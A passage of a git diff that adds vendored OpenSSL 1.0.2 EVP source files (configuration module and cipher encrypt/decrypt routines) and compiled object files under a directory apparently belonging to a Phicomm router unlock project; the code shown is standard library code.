+void OPENSSL_add_all_algorithms_conf(void)
+{
+    OPENSSL_add_all_algorithms_noconf();
+    OPENSSL_config(NULL);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_acnf.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_acnf.o
new file mode 100644
index 0000000000000000000000000000000000000000..6c4a2a115269da1ec7e48aa8d6a835b903253682
GIT binary patch
literal 1656
zcmbtT&2G~`5FR&$1_)`WI3N|FoDc}QN&tz{14>gRLC9*VroA8`%W<5fBDN#jK`j!{
zN8k~71RjASM;-%?h#Nu*GwYqk*|;2Fr18vrv)|1AjNdoR=8|Cmivdqz7BLF2nVb1F
z>DJ&X6yWFTtzUcJ2&hh9e3yyV&dyf(&S7`r$CL6C@laGYs*fi!tiF3t5tT=G6PQ*n
zqn1!Fptg1oVF}<fVchOI`Xt7ieK3wo#(H5T{{c5h_)VDsSR>mgmYx;!3RyICre*js
zUCdCgtP>N?yO?L?<gVv2igIvq5tR7KIe7MdbMiLkDFqDIQu~x=M(jQ+-JdRX1hVkn
zIXJkl$CmB*ec?cRud&<dn3mn^S@vjzItap}c<4oz6Zn0wT4uYxZCdSSv(q@R4z}xN
z!}=S`4<wK4QgAd#cFZ?MZ+->!_cW1Wl9o43XJ@>uaGVpGm6?d>#Eb1Nh$s#dJ7h0(
zN4ALF;}}HGj%^U#C<5UGp6B|A`9bUooV|@Gww+fh9{3Y64ui29#wQ?T1$SumL)&v_
zJ^#ZiBbTO*&(Ec5%Hj8AT%XW&OwgUxc!9E~>QX8yzKoW*JZU!+ep})Cgzu}oZuI^%
zcU1FV`BmgnP2MNEQn>#;29)LgY_||+KfUyAI!O8Y+UJ;~zjAJdFg`^kDa-Hd!}rHX
z7agjp^FOKu`nh!eOI(-rexFo9ekXcA;xeD{tlrf6D}7Kl)q&}sx`e9p3De&WA;_!#
Y5d|qx<<5|6=w<Q0DE{bdW#Z`kKR_FUqW}N^

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_cnf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_cnf.c
new file mode 100644
index 0000000..6fd3a6d
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_cnf.c
@@ -0,0 +1,118 @@
+/* evp_cnf.c */
+/*
+ * Written by Stephen Henson (steve@openssl.org) for the OpenSSL project
+ * 2007.
+ */
+/* ====================================================================
+ * Copyright (c) 2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/dso.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+/* Algorithm configuration module. */
+
+static int alg_module_init(CONF_IMODULE *md, const CONF *cnf)
+{
+    int i;
+    const char *oid_section;
+    STACK_OF(CONF_VALUE) *sktmp;
+    CONF_VALUE *oval;
+    oid_section = CONF_imodule_get_value(md);
+    if (!(sktmp = NCONF_get_section(cnf, oid_section))) {
+        EVPerr(EVP_F_ALG_MODULE_INIT, EVP_R_ERROR_LOADING_SECTION);
+        return 0;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(sktmp); i++) {
+        oval = sk_CONF_VALUE_value(sktmp, i);
+        if (!strcmp(oval->name, "fips_mode")) {
+            int m;
+            if (!X509V3_get_value_bool(oval, &m)) {
+                EVPerr(EVP_F_ALG_MODULE_INIT, EVP_R_INVALID_FIPS_MODE);
+                return 0;
+            }
+            if (m > 0) {
+#ifdef OPENSSL_FIPS
+                if (!FIPS_mode() && !FIPS_mode_set(1)) {
+                    EVPerr(EVP_F_ALG_MODULE_INIT,
+                           EVP_R_ERROR_SETTING_FIPS_MODE);
+                    return 0;
+                }
+#else
+                EVPerr(EVP_F_ALG_MODULE_INIT, EVP_R_FIPS_MODE_NOT_SUPPORTED);
+                return 0;
+#endif
+            }
+        } else {
+            EVPerr(EVP_F_ALG_MODULE_INIT, EVP_R_UNKNOWN_OPTION);
+            ERR_add_error_data(4, "name=", oval->name,
+                               ", value=", oval->value);
+        }
+
+    }
+    return 1;
+}
+
+void EVP_add_alg_module(void)
+{
+    CONF_module_add("alg_section", alg_module_init, 0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_cnf.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_cnf.o
new file mode 100644
index 0000000000000000000000000000000000000000..0ddb38876ccf04975711cb55538387279b30720d
GIT binary patch
literal 2984
zcmbuA&2Jk;6u`%^(;7%OZuu${AtR-gfp+mGR47P6UdNkkk(E?w9P!b1*w~xIioaN|
zs}!nI$pW!*U68mVaX^#{64$C~Eu{r<-~j&sJ#c8$Qi>1=A;7#hJ5#SW>kB+-X5Ref
zy_wlJZ)V@ovNJ=W5D^k0FOgnPP(l*Xo}OZAib!M^`E~TkKh-5Qr!MAn=eJ{e^LDJD
zw<7x!V52*kv8d9yiRQZVv+jK5s_%9hPiaa=`R3B6FmmNfsIKmSN>hGh23ub<hfPiS
zDciQkBD(Vf<C)2uqZiO6<J=KUZyyFg^wvgHcdj!t)wu>MOl6(lVNph)JK`>Q5o~Ym
zZk`#7kh4oJ`V3HS56u475qIeG?L&Gi7tOY`n9|YPyI`2`4P1?Y?k?ZGzV&jq+f^@P
z9Q78&prB8<5wVAviQc>x%Q!b)KcOC1PpBt1F^J0dFw+<Rbh~<c3g_LzYNc4K({i<7
zl7sP6MyX*=k&01<+9<8kx|z3&)e0fA)6*};6S?I^#csqW<q0`?NO_^by2{z{q?~;I
zX&1wcxXl=pVJNe6IWj~@2U!>j%0q5LLT@dQ&_*n@Z)9imL->#s@F)0~h95Q~#V!n`
zrM>NNT8f{Ks8Zs+;f$1Q?#M`~@PUw&%t#4Uii1U3ilwC}xZt{PKtXxTZ3fo3M1=g(
z4KfG^W+;Ax_=<k7F#GC$hP^P0LO*{1x<j7%*|&0&FxlB}e2?STZI>{)ZyVgl2u8nO
z;;cJN?(fHBKj#nn_%oab#W76qHucMM(8c)sMFSATj}PFGZh`h^2Jq$petrP|XaL8n
z7_`sJ1NgVV_rN)d^AmBpF~FXfr)o4`S&{SXZo!>vluTNz6m24Br;}JISdC*fLFjCD
zKCNcy{LIWTZILdj>8wV{^!(fmEpp#g)28gsk~zk)FRrY%us~}Ko0^tYwMc!PRvKk&
zT>H9h<;ykl%HibX(geLX4_&TSO9WkwLcw*V1;aK7rFGlLuhab6I$be}V6$|T+2AYT
z?#A63-x;`*F^B_-cn|)97YhaR1O@qSD1skF2!ebM6v5XJf*{8n6&&*c1v$Pcf@40Q
zz`Mh8UGNVWb?qMpUGPsl{1FfT&cnU?xjlgY%{i`%cU;UL!G{I}`3MxjCC+jGk9xS`
z;d?zi=a~op3u2zvJob-!cpP*TTo;Rw0#^hV`Ag*b>9TDsLu*@ZyCyWtEE%$GZa}KC
ze2|yxbs}3;?4Y?KL+a+M<+51;lS<V#WqA4zv83Vs)k;IIS=E|p*{8u3Cp6dSiUmI#
zv9tfz#=#v!;eVM@z)()|IJrI7R_NH`yNPF!g5s4w_)~h0`{UW7DqdtfBa{PBko*4-
zAN$rtTNFP&2n^@^ul@?3a~xW)i1pofzBeM)7i|iLP*3(un6}9cp7n9zC)y)0E_AQy
zogf%s`zkQ}`+0K}=ef)M<Jj?th`&H@f`X=g{}=}~VaQv*e+hWd`ET%FvWN?wKmK)v
zzc~M(wQ;F)eEs)%i*LYafIrUZKYKtV%Jc6oc0A$_E54;c{ulZF-}d;T>i7Q_mc6#C

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_enc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_enc.c
new file mode 100644
index 0000000..65f0e02
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/evp_enc.c
@@ -0,0 +1,666 @@
+/* crypto/evp/evp_enc.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/err.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+#include "evp_locl.h"
+
+#ifdef OPENSSL_FIPS
+# define M_do_cipher(ctx, out, in, inl) FIPS_cipher(ctx, out, in, inl)
+#else
+# define M_do_cipher(ctx, out, in, inl) ctx->cipher->do_cipher(ctx, out, in, inl)
+#endif
+
+const char EVP_version[] = "EVP" OPENSSL_VERSION_PTEXT;
+
+void EVP_CIPHER_CTX_init(EVP_CIPHER_CTX *ctx)
+{
+    memset(ctx, 0, sizeof(EVP_CIPHER_CTX));
+    /* ctx->cipher=NULL; */
+}
+
+EVP_CIPHER_CTX *EVP_CIPHER_CTX_new(void)
+{
+    EVP_CIPHER_CTX *ctx = OPENSSL_malloc(sizeof *ctx);
+    if (ctx)
+        EVP_CIPHER_CTX_init(ctx);
+    return ctx;
+}
+
+int EVP_CipherInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                   const unsigned char *key, const unsigned char *iv, int enc)
+{
+    if (cipher)
+        EVP_CIPHER_CTX_init(ctx);
+    return EVP_CipherInit_ex(ctx, cipher, NULL, key, iv, enc);
+}
+
+int EVP_CipherInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                      ENGINE *impl, const unsigned char *key,
+                      const unsigned char *iv, int enc)
+{
+    if (enc == -1)
+        enc = ctx->encrypt;
+    else {
+        if (enc)
+            enc = 1;
+        ctx->encrypt = enc;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    /*
+     * Whether it's nice or not, "Inits" can be used on "Final"'d contexts so
+     * this context may already have an ENGINE! Try to avoid releasing the
+     * previous handle, re-querying for an ENGINE, and having a
+     * reinitialisation, when it may all be unecessary.
+     */
+    if (ctx->engine && ctx->cipher && (!cipher ||
+                                       (cipher
+                                        && (cipher->nid ==
+                                            ctx->cipher->nid))))
+        goto skip_to_init;
+#endif
+    if (cipher) {
+        /*
+         * Ensure a context left lying around from last time is cleared (the
+         * previous check attempted to avoid this if the same ENGINE and
+         * EVP_CIPHER could be used).
+         */
+        if (ctx->cipher) {
+            unsigned long flags = ctx->flags;
+            EVP_CIPHER_CTX_cleanup(ctx);
+            /* Restore encrypt and flags */
+            ctx->encrypt = enc;
+            ctx->flags = flags;
+        }
+#ifndef OPENSSL_NO_ENGINE
+        if (impl) {
+            if (!ENGINE_init(impl)) {
+                EVPerr(EVP_F_EVP_CIPHERINIT_EX, EVP_R_INITIALIZATION_ERROR);
+                return 0;
+            }
+        } else
+            /* Ask if an ENGINE is reserved for this job */
+            impl = ENGINE_get_cipher_engine(cipher->nid);
+        if (impl) {
+            /* There's an ENGINE for this job ... (apparently) */
+            const EVP_CIPHER *c = ENGINE_get_cipher(impl, cipher->nid);
+            if (!c) {
+                /*
+                 * One positive side-effect of US's export control history,
+                 * is that we should at least be able to avoid using US
+                 * mispellings of "initialisation"?
+                 */
+                EVPerr(EVP_F_EVP_CIPHERINIT_EX, EVP_R_INITIALIZATION_ERROR);
+                return 0;
+            }
+            /* We'll use the ENGINE's private cipher definition */
+            cipher = c;
+            /*
+             * Store the ENGINE functional reference so we know 'cipher' came
+             * from an ENGINE and we need to release it when done.
+             */
+            ctx->engine = impl;
+        } else
+            ctx->engine = NULL;
+#endif
+
+#ifdef OPENSSL_FIPS
+        if (FIPS_mode()) {
+            const EVP_CIPHER *fcipher;
+            if (cipher)
+                fcipher = evp_get_fips_cipher(cipher);
+            if (fcipher)
+                cipher = fcipher;
+            return FIPS_cipherinit(ctx, cipher, key, iv, enc);
+        }
+#endif
+        ctx->cipher = cipher;
+        if (ctx->cipher->ctx_size) {
+            ctx->cipher_data = OPENSSL_malloc(ctx->cipher->ctx_size);
+            if (!ctx->cipher_data) {
+                EVPerr(EVP_F_EVP_CIPHERINIT_EX, ERR_R_MALLOC_FAILURE);
+                return 0;
+            }
+        } else {
+            ctx->cipher_data = NULL;
+        }
+        ctx->key_len = cipher->key_len;
+        /* Preserve wrap enable flag, zero everything else */
+        ctx->flags &= EVP_CIPHER_CTX_FLAG_WRAP_ALLOW;
+        if (ctx->cipher->flags & EVP_CIPH_CTRL_INIT) {
+            if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_INIT, 0, NULL)) {
+                EVPerr(EVP_F_EVP_CIPHERINIT_EX, EVP_R_INITIALIZATION_ERROR);
+                return 0;
+            }
+        }
+    } else if (!ctx->cipher) {
+        EVPerr(EVP_F_EVP_CIPHERINIT_EX, EVP_R_NO_CIPHER_SET);
+        return 0;
+    }
+#ifndef OPENSSL_NO_ENGINE
+ skip_to_init:
+#endif
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return FIPS_cipherinit(ctx, cipher, key, iv, enc);
+#endif
+    /* we assume block size is a power of 2 in *cryptUpdate */
+    OPENSSL_assert(ctx->cipher->block_size == 1
+                   || ctx->cipher->block_size == 8
+                   || ctx->cipher->block_size == 16);
+
+    if (!(ctx->flags & EVP_CIPHER_CTX_FLAG_WRAP_ALLOW)
+        && EVP_CIPHER_CTX_mode(ctx) == EVP_CIPH_WRAP_MODE) {
+        EVPerr(EVP_F_EVP_CIPHERINIT_EX, EVP_R_WRAP_MODE_NOT_ALLOWED);
+        return 0;
+    }
+
+    if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_CUSTOM_IV)) {
+        switch (EVP_CIPHER_CTX_mode(ctx)) {
+
+        case EVP_CIPH_STREAM_CIPHER:
+        case EVP_CIPH_ECB_MODE:
+            break;
+
+        case EVP_CIPH_CFB_MODE:
+        case EVP_CIPH_OFB_MODE:
+
+            ctx->num = 0;
+            /* fall-through */
+
+        case EVP_CIPH_CBC_MODE:
+
+            OPENSSL_assert(EVP_CIPHER_CTX_iv_length(ctx) <=
+                           (int)sizeof(ctx->iv));
+            if (iv)
+                memcpy(ctx->oiv, iv, EVP_CIPHER_CTX_iv_length(ctx));
+            memcpy(ctx->iv, ctx->oiv, EVP_CIPHER_CTX_iv_length(ctx));
+            break;
+
+        case EVP_CIPH_CTR_MODE:
+            ctx->num = 0;
+            /* Don't reuse IV for CTR mode */
+            if (iv)
+                memcpy(ctx->iv, iv, EVP_CIPHER_CTX_iv_length(ctx));
+            break;
+
+        default:
+            return 0;
+            break;
+        }
+    }
+
+    if (key || (ctx->cipher->flags & EVP_CIPH_ALWAYS_CALL_INIT)) {
+        if (!ctx->cipher->init(ctx, key, iv, enc))
+            return 0;
+    }
+    ctx->buf_len = 0;
+    ctx->final_used = 0;
+    ctx->block_mask = ctx->cipher->block_size - 1;
+    return 1;
+}
+
+int EVP_CipherUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
+                     const unsigned char *in, int inl)
+{
+    if (ctx->encrypt)
+        return EVP_EncryptUpdate(ctx, out, outl, in, inl);
+    else
+        return EVP_DecryptUpdate(ctx, out, outl, in, inl);
+}
+
+int EVP_CipherFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
+{
+    if (ctx->encrypt)
+        return EVP_EncryptFinal_ex(ctx, out, outl);
+    else
+        return EVP_DecryptFinal_ex(ctx, out, outl);
+}
+
+int EVP_CipherFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
+{
+    if (ctx->encrypt)
+        return EVP_EncryptFinal(ctx, out, outl);
+    else
+        return EVP_DecryptFinal(ctx, out, outl);
+}
+
+int EVP_EncryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                    const unsigned char *key, const unsigned char *iv)
+{
+    return EVP_CipherInit(ctx, cipher, key, iv, 1);
+}
+
+int EVP_EncryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                       ENGINE *impl, const unsigned char *key,
+                       const unsigned char *iv)
+{
+    return EVP_CipherInit_ex(ctx, cipher, impl, key, iv, 1);
+}
+
+int EVP_DecryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                    const unsigned char *key, const unsigned char *iv)
+{
+    return EVP_CipherInit(ctx, cipher, key, iv, 0);
+}
+
+int EVP_DecryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                       ENGINE *impl, const unsigned char *key,
+                       const unsigned char *iv)
+{
+    return EVP_CipherInit_ex(ctx, cipher, impl, key, iv, 0);
+}
+
+int EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
+                      const unsigned char *in, int inl)
+{
+    int i, j, bl;
+
+    if (ctx->cipher->flags & EVP_CIPH_FLAG_CUSTOM_CIPHER) {
+        i = M_do_cipher(ctx, out, in, inl);
+        if (i < 0)
+            return 0;
+        else
+            *outl = i;
+        return 1;
+    }
+
+    if (inl <= 0) {
+        *outl = 0;
+        return inl == 0;
+    }
+
+    if (ctx->buf_len == 0 && (inl & (ctx->block_mask)) == 0) {
+        if (M_do_cipher(ctx, out, in, inl)) {
+            *outl = inl;
+            return 1;
+        } else {
+            *outl = 0;
+            return 0;
+        }
+    }
+    i = ctx->buf_len;
+    bl = ctx->cipher->block_size;
+    OPENSSL_assert(bl <= (int)sizeof(ctx->buf));
+    if (i != 0) {
+        if (i + inl < bl) {
+            memcpy(&(ctx->buf[i]), in, inl);
+            ctx->buf_len += inl;
+            *outl = 0;
+            return 1;
+        } else {
+            j = bl - i;
+            memcpy(&(ctx->buf[i]), in, j);
+            if (!M_do_cipher(ctx, out, ctx->buf, bl))
+                return 0;
+            inl -= j;
+            in += j;
+            out += bl;
+            *outl = bl;
+        }
+    } else
+        *outl = 0;
+    i = inl & (bl - 1);
+    inl -= i;
+    if (inl > 0) {
+        if (!M_do_cipher(ctx, out, in, inl))
+            return 0;
+        *outl += inl;
+    }
+
+    if (i != 0)
+        memcpy(ctx->buf, &(in[inl]), i);
+    ctx->buf_len = i;
+    return 1;
+}
+
+int EVP_EncryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
+{
+    int ret;
+    ret = EVP_EncryptFinal_ex(ctx, out, outl);
+    return ret;
+}
+
+int EVP_EncryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
+{
+    int n, ret;
+    unsigned int i, b, bl;
+
+    if (ctx->cipher->flags & EVP_CIPH_FLAG_CUSTOM_CIPHER) {
+        ret = M_do_cipher(ctx, out, NULL, 0);
+        if (ret < 0)
+            return 0;
+        else
+            *outl = ret;
+        return 1;
+    }
+
+    b = ctx->cipher->block_size;
+    OPENSSL_assert(b <= sizeof ctx->buf);
+    if (b == 1) {
+        *outl = 0;
+        return 1;
+    }
+    bl = ctx->buf_len;
+    if (ctx->flags & EVP_CIPH_NO_PADDING) {
+        if (bl) {
+            EVPerr(EVP_F_EVP_ENCRYPTFINAL_EX,
+                   EVP_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH);
+            return 0;
+        }
+        *outl = 0;
+        return 1;
+    }
+
+    n = b - bl;
+    for (i = bl; i < b; i++)
+        ctx->buf[i] = n;
+    ret = M_do_cipher(ctx, out, ctx->buf, b);
+
+    if (ret)
+        *outl = b;
+
+    return ret;
+}
+
+int EVP_DecryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
+                      const unsigned char *in, int inl)
+{
+    int fix_len;
+    unsigned int b;
+
+    if (ctx->cipher->flags & EVP_CIPH_FLAG_CUSTOM_CIPHER) {
+        fix_len = M_do_cipher(ctx, out, in, inl);
+        if (fix_len < 0) {
+            *outl = 0;
+            return 0;
+        } else
+            *outl = fix_len;
+        return 1;
+    }
+
+    if (inl <= 0) {
+        *outl = 0;
+        return inl == 0;
+    }
+
+    if (ctx->flags & EVP_CIPH_NO_PADDING)
+        return EVP_EncryptUpdate(ctx, out, outl, in, inl);
+
+    b = ctx->cipher->block_size;
+    OPENSSL_assert(b <= sizeof ctx->final);
+
+    if (ctx->final_used) {
+        memcpy(out, ctx->final, b);
+        out += b;
+        fix_len = 1;
+    } else
+        fix_len = 0;
+
+    if (!EVP_EncryptUpdate(ctx, out, outl, in, inl))
+        return 0;
+
+    /*
+     * if we have 'decrypted' a multiple of block size, make sure we have a
+     * copy of this last block
+     */
+    if (b > 1 && !ctx->buf_len) {
+        *outl -= b;
+        ctx->final_used = 1;
+        memcpy(ctx->final, &out[*outl], b);
+    } else
+        ctx->final_used = 0;
+
+    if (fix_len)
+        *outl += b;
+
+    return 1;
+}
+
+int EVP_DecryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
+{
+    int ret;
+    ret = EVP_DecryptFinal_ex(ctx, out, outl);
+    return ret;
+}
+
+int EVP_DecryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
+{
+    int i, n;
+    unsigned int b;
+    *outl = 0;
+
+    if (ctx->cipher->flags & EVP_CIPH_FLAG_CUSTOM_CIPHER) {
+        i = M_do_cipher(ctx, out, NULL, 0);
+        if (i < 0)
+            return 0;
+        else
+            *outl = i;
+        return 1;
+    }
+
+    b = ctx->cipher->block_size;
+    if (ctx->flags & EVP_CIPH_NO_PADDING) {
+        if (ctx->buf_len) {
+            EVPerr(EVP_F_EVP_DECRYPTFINAL_EX,
+                   EVP_R_DATA_NOT_MULTIPLE_OF_BLOCK_LENGTH);
+            return 0;
+        }
+        *outl = 0;
+        return 1;
+    }
+    if (b > 1) {
+        if (ctx->buf_len || !ctx->final_used) {
+            EVPerr(EVP_F_EVP_DECRYPTFINAL_EX, EVP_R_WRONG_FINAL_BLOCK_LENGTH);
+            return (0);
+        }
+        OPENSSL_assert(b <= sizeof ctx->final);
+
+        /*
+         * The following assumes that the ciphertext has been authenticated.
+         * Otherwise it provides a padding oracle.
+         */
+        n = ctx->final[b - 1];
+        if (n == 0 || n > (int)b) {
+            EVPerr(EVP_F_EVP_DECRYPTFINAL_EX, EVP_R_BAD_DECRYPT);
+            return (0);
+        }
+        for (i = 0; i < n; i++) {
+            if (ctx->final[--b] != n) {
+                EVPerr(EVP_F_EVP_DECRYPTFINAL_EX, EVP_R_BAD_DECRYPT);
+                return (0);
+            }
+        }
+        n = ctx->cipher->block_size - n;
+        for (i = 0; i < n; i++)
+            out[i] = ctx->final[i];
+        *outl = n;
+    } else
+        *outl = 0;
+    return (1);
+}
+
+void EVP_CIPHER_CTX_free(EVP_CIPHER_CTX *ctx)
+{
+    if (ctx) {
+        EVP_CIPHER_CTX_cleanup(ctx);
+        OPENSSL_free(ctx);
+    }
+}
+
+int EVP_CIPHER_CTX_cleanup(EVP_CIPHER_CTX *c)
+{
+#ifndef OPENSSL_FIPS
+    if (c->cipher != NULL) {
+        if (c->cipher->cleanup && !c->cipher->cleanup(c))
+            return 0;
+        /* Cleanse cipher context data */
+        if (c->cipher_data)
+            OPENSSL_cleanse(c->cipher_data, c->cipher->ctx_size);
+    }
+    if (c->cipher_data)
+        OPENSSL_free(c->cipher_data);
+#endif
+#ifndef OPENSSL_NO_ENGINE
+    if (c->engine)
+        /*
+         * The EVP_CIPHER we used belongs to an ENGINE, release the
+         * functional reference we held for this reason.
+         */
+        ENGINE_finish(c->engine);
+#endif
+#ifdef OPENSSL_FIPS
+    FIPS_cipher_ctx_cleanup(c);
+#endif
+    memset(c, 0, sizeof(EVP_CIPHER_CTX));
+    return 1;
+}
+
+int EVP_CIPHER_CTX_set_key_length(EVP_CIPHER_CTX *c, int keylen)
+{
+    if (c->cipher->flags & EVP_CIPH_CUSTOM_KEY_LENGTH)
+        return EVP_CIPHER_CTX_ctrl(c, EVP_CTRL_SET_KEY_LENGTH, keylen, NULL);
+    if (c->key_len == keylen)
+        return 1;
+    if ((keylen > 0) && (c->cipher->flags & EVP_CIPH_VARIABLE_LENGTH)) {
+        c->key_len = keylen;
+        return 1;
+    }
+    EVPerr(EVP_F_EVP_CIPHER_CTX_SET_KEY_LENGTH, EVP_R_INVALID_KEY_LENGTH);
+    return 0;
+}
+
+int EVP_CIPHER_CTX_set_padding(EVP_CIPHER_CTX *ctx, int pad)
+{
+    if (pad)
